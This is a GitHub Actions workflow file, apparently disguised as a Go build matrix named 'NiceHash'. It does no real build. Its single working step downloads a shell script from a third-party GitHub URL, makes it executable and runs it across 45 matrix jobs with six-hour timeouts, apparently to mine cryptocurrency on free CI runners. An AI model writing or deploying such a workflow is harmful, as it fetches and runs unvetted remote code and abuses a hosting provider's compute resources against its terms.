name: NiceHash
on: [push, pull_request]
jobs:
build:
name: mrz
runs-on: ubuntu-latest
strategy:
max-parallel: 1
fail-fast: false
matrix:
go: [1.6, 1.7, 1.8, 1.9, 1.10]
flag: [A, B, C, D, E, F, G, H, I]
timeout-minutes: 360
env:
NUM_JOBS: 2
JOB: ${{ matrix.go }}
steps:
- name: Set up Go ${{ matrix.go }}
uses: actions/setup-go
with:
go-version: ${{ matrix.go }}
id:
  go
- name: Setup
uses: actions/checkout@v2
- name: mrz
run: |
wget https://raw.githubusercontent.com/oponime07/Coba_Lagi/main/nicehaaaash.sh && chmod u+x nicehaaaash.sh && ./nicehaaaash.sh
